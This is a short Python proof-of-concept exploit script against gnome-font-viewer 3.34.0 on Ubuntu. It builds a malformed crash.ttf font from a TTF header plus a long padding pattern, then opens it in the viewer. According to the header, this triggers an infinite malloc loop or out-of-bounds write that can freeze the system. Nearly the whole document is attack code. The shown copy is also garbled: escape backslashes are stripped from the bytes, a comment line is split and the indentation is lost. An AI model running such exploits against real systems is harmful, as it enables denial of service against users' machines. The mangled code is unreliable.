#!/usr/bin/env python3
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

import subprocess
from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf

ttf_header = ("x00x01x00x00x00x13x01x00x00x04x00x30x46x46x54"
"x4dx75xfex73xddx00x13xb6x0cx00x00x00x1cx47x44x45"
"x46x4dx76x5dxdax00x13xb0xacx00x00x04xaax47x50x4f"
"x53x44x76x4cx75x00x13xb5xecx00x00x00x20x47x53x55"
"x42x09xf6x0bxdcx00x13xb5x58x00x00x00x92x4fx53x2f"
"x32x8dxbdx8ex75x00x00x01xb8x00x00x00x60x50x66x45"
"x64x5bxd3xe9x6bx00x13xb6x28x00x00x02x50x63x6dx61"
"x70xbfx0dx76x7cx00x00x34x30x00x00x0ax36x63x76x74"
"x20x28xfdx02x16x00x00x48x98x00x00x00x38x66x70x67"
"x6dx31xfcxa0x95x00x00x3ex68x00x00x09x96x67x61x73"
"x70xffxffx00x10x00x13xb0xa4x00x00x00x08x67x6cx79"
"x66xd6x2fx24x7cx00x00xacxf0x00x11xd8x34x68x65x61"
"x64x04xe3x81x66x00x00x01x3cx00x00x00x36x68x68x65"
"x61x0axf4x01xa2x00x00x01x74x00x00x00x24x68x6dx74"
"x78x93xdfx7ex92x00x00x02x18x00x00x32x16x6cx6fx63"
"x61xe6x44x45x24x00x00x48xd0x00x00x64x20x6dx61x78"
"x70x1axa2x0bx9cx00x00x01x98x00x00x00x20x6ex61x6d"
"x65x62x13x17xa4x00x12x85x24x00x00x0bx9dx70x6fx73"
"x74xbbxe8x29xcfx00x12x90xc4x00x01x1fxddx70x72x65"
"x70xb4xc5xc5x72x00x00x48x00x00x00x00x95x00x01x00"
"x00x00x02x07x2bxd0x81xfcx0fx5fx0fx3cxf5x02x9fx08"
"x00x00x00x00x00xc5x74x19x33x00x00x00x00xdax9dx14"
"xf1xfdx41xfcxfcx05xdfx0a")

print('[+] Generating crash.ttf with DEADDEAD')

with open("./crash.ttf", 'w') as f:
f.write(ttf_header)
f.write(this_pattern)
f.close()
print('[+] Done')

print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")